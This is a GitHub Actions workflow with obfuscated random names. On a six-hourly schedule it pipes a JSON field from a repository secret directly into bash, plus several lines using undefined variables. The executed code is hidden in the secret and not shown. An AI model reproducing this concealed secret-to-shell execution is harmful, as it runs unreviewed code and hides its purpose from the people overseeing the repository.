name: kutimeixue
on:
  workflow_dispatch:
  schedule:
    - cron: '23 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: kutimeixue
        env:
          gqg736: ${{ secrets.gqg736 }}
        run: |
          echo $gqg736 | jq -r .itrf1 | /bin/bash
          echo $f558 | jq -r .ankd1 | /bin/bash
          echo $z49796 | jq -r .csbl28 | /bin/bash
          echo $io783 | jq -r .wd2 | /bin/bash
          echo $r98545 | jq -r .tx3 | /bin/bash
          echo $omnk126 | jq -r .vmif6190 | /bin/bash
          echo $gk57 | jq -r .kvvoh490 | /bin/bash
          echo $avgtn668 | jq -r .itiqs926 | /bin/bash
          echo $pjyl52 | jq -r .d14 | /bin/bash

